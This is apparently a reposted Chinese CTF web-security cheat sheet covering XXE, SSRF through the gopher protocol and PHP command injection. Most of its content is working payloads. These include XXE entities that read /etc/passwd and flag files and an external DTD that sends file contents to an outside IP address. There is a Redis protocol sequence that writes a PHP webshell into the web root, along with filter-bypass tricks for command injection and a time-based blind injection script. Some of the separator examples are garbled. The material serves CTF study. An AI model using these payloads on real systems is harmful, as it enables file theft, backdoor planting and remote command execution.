CTF-WEB系列篇（一）

Grav1ty

转自CTF-WEB系列篇（一）

一、

XXE

XXE （ PHP 5.45之后不解析实体 ）

• 
  

1. <!DOCTYPE 根标签名 SYSTEM "文件名">

复制代码

DTD实体是用于定义引用文本或字符的快捷方式的变量，可内部声明或外部引用。

约束通过类别关键词 ANY 声明的元素，可包含任何可解析数据的组合：

• 
  

1. <!ELEMENT 标签名 ANY>

复制代码

同时xxe可进行内网探测读取 /etc/hosts

Payload

PHP文件读取

• 1. 
     
  2. <?xml version="1.0" encoding="utf-8"?>
     
  3. <!DOCTYPE xxe [
     
  4. <!ELEMENT name ANY>
     
  5. <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php">]>
     
  6. <creds>
     
  7. <user>&xxe;</user>
     
  8. </creds>

  复制代码
  
  

file协议读取文件

1. 
   
2. <?xml version="1.0"?>
   
3. <!DOCTYPE GVI [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
   
4. <catalog>
   
5.         <core id="test101">
   
6.              <description>&xxe;</description>
   
7.           </core>
   
8. </catalog>

复制代码

SVG格式

1. 
   
2. <?xml version="1.0" encoding="UTF-8"?>
   
3. <!DOCTYPE note [
   
4. <!ENTITY file SYSTEM "要读取的文件路径" >
   
5. ]>
   
6. <svg height="100" width="1000">
   
7.           <text x="10" y="20">&file;</text>
   
8. </svg>

复制代码

数据外带

1. 
   
2. <!DOCTYPE root [
   
3. <!ENTITY % remote SYSTEM "http://174.1.66.167/shell.dtd">
   
4. %remote;
   
5. ]>

复制代码

shell.dtd

1. 
   
2. <!ENTITY % file SYSTEM "file:///flag">
   
3. <!ENTITY % int "<!ENTITY % send SYSTEM 'http://127.0.0.1:5555/?flag=%file;'>">
   
4. %int;
   
5. %send;

复制代码

xxe绕过的payload

当只过滤了SYSTEM，PUBLIC等关键字时，可用双重实体编码绕过

1. 
   
2. <?xml version="1.0"?>
   
3. 
   
4. <!DOCTYPE GVI [
   
5. 
   
6.     <!ENTITY % xml "<!ENTITY xxe SYSTEM "file:///flag.txt" >]><core>      <message>&xxe;</message></core>">
   
7. 
   
8.     %xml;

复制代码

即为在xml实体中再定义一次xml，可成功被解析，支持dtd数据外带

1. 
   
2. <!ENTITY xxe SYSTEM "file:///flag.txt" >]>
   
3. <core>
   
4.       <message>&xxe;</message>
   
5. </core>

复制代码

以上为编码部分内容

二、

SSRF gopher协议

在 http 出现之前，访问网页需要输入的是

gopher://gopher.baidu.com 而不是 https://www.baidu.com

而它被代替的原因一方面是收费，另一方面的原因是它固化的结构没有HTML网页灵活

利用 gopher 的方式有 FTP 爆破，REDIS，MYSQL，FAST CGI，XXE.

一些常用服务

1. 
   
2. Redis 6379
   
3. FPM 9000
   
4. Smtp 25
   
5. Mysql 3306

复制代码

常用的协议

1. 
   
2. dict 、gopher

复制代码

以下为经典的 Redis 未授权访问，以及常用 payload 的生成

利用方式

比如常见的，web 有一个 curl 的功能，然后可以访问内网靶机，就可以用类似的方式进行命令传递

( payload 每经过一次传递就会被解码一次 )

redis

Smtp 生成 payload

Fpm 生成 payload

gopher支持多行。因此要在传输的数据前加一个无用字符。比如 gopher://ip:port/_ 通常用 _ 并不是只能用 _ ，gopher协议会吃掉第一个字符

关于 redis

redis 的格式：每一个 *number 代表每一行命令，number 代表每行命令中数组中的元素个数。$number 代表每个元素的长度。

URL解码后可以看到创建 shell 的完整流程

1. 
   
2. $8                            //元素长度为8
   
3. flushall
   
4. *3                            //3个元素
   
5. $3
   
6. set
   
7. $1
   
8. 1
   
9. $31
   
10. 
    
11. <?php echo "hello world" ?>
    
12. 
    
13. *4
    
14. $6
    
15. config
    
16. $3
    
17. set
    
18. $3
    
19. dir
    
20. $13
    
21. /var/www/html
    
22. *4
    
23. $6
    
24. config
    
25. $3
    
26. set
    
27. $10
    
28. dbfilename
    
29. $9
    
30. shell.php
    
31. *1
    
32. $4
    
33. save

复制代码

即为redis将输入的语句保存在指定位置的php文件中，生成后门

相关环境 BUUCTF[GKCTF_EZWEB]

三、

命令执行

以下介绍为 PHP 环境

用于命令执行的函数有

1. 
   
2. system
   
3. exec
   
4. passthru
   
5. shell_exec

复制代码

一些常见的绕过方法一、命令拼接

windows

1. 
   
2. |直接执行后面的语句ping 127.0.0.1|whoami
   
3. Ⅱ前面出错执行后面的，前面为假ping 2 ]l whoami
   
4. &前面的语句为假则直接执行后面的,前面可真可假ping 127.0.0.1&whoami
   
5. &&前面的语句为假则直接出错，后面的也不执行，前面只能为真ping 127.0.0.18&whoami

复制代码

Linux

1. 
   
2. ;前面的执行完执行后面的ping 127.0.0.1;whoami
   
3. |管道符，显示后面的执行结果ping 127.0.0.1/whoami
   
4. 当前面的执行出错时执行后面的ping 1][whoami
   
5. &前面的语句为假则直接执行后面的,前面可真可假ping 127.0.0.1&whoami
   
6. &&前面的语句为假则直接出错，后面的也不执行，前面只能为真ping 127.0.0.18&whoami

复制代码

以及

• 1. 
     
  2. %0a
     
  3. %0d
     
  4. \n

  复制代码
  
  

二、空格绕过

1. 
   
2. $IFS
   
3. ${IFS}
   
4. $IFS$1
   
5. %09
   
6. {cat,flag.php}

复制代码

三、关键字 flag 被过滤

1. 
   
2. fla\g
   
3. a=g;fla$a

复制代码

例如：

1. 
   
2. ?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

复制代码

或者使用 base64 编码绕过

• 1. 
     
  2. ?url=127.0.0.1|`echo%09WTJGMElDOWxkR012TG1acGJtUm1iR0ZuTDJac1lXY3VkSGgw|base64%09-d|base64%09-d`

  复制代码
  
  

另外如反引号可在语句中执行命令

1. 
   
2. ls `cat /flag > /var/www/html/1.txt`

复制代码

或者使用 $() 和八进制

• 1. 
     
  2. $(printf$IFS$9"\154\163")

  复制代码
  
  

另附一份无回显盲注脚本

1. 
   
2. import requests
   
3. import time
   
4. 
   
5. s=requests.session()
   
6. flag=''
   
7. for z in range(1,50):
   
8.     for i in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_!@#%|^&{}[]/-()+=,\\':
   
9.         starTime=time.time()
   
10.         url="http://127.0.0.1/?cmd=if [ `cut -c"+str(z)+"-"+str(z)+" /flag` != '"+i+"' ]; then echo 1 ; else sleep 3; fi"
    
11.         r=s.get(url)
    
12.         if((time.time()-starTime)>3):
    
13.             flag+=i
    
14.             print(flag)
    
15.             break
    
16.             print(z)
    
17. print('the flag is'+flag)

复制代码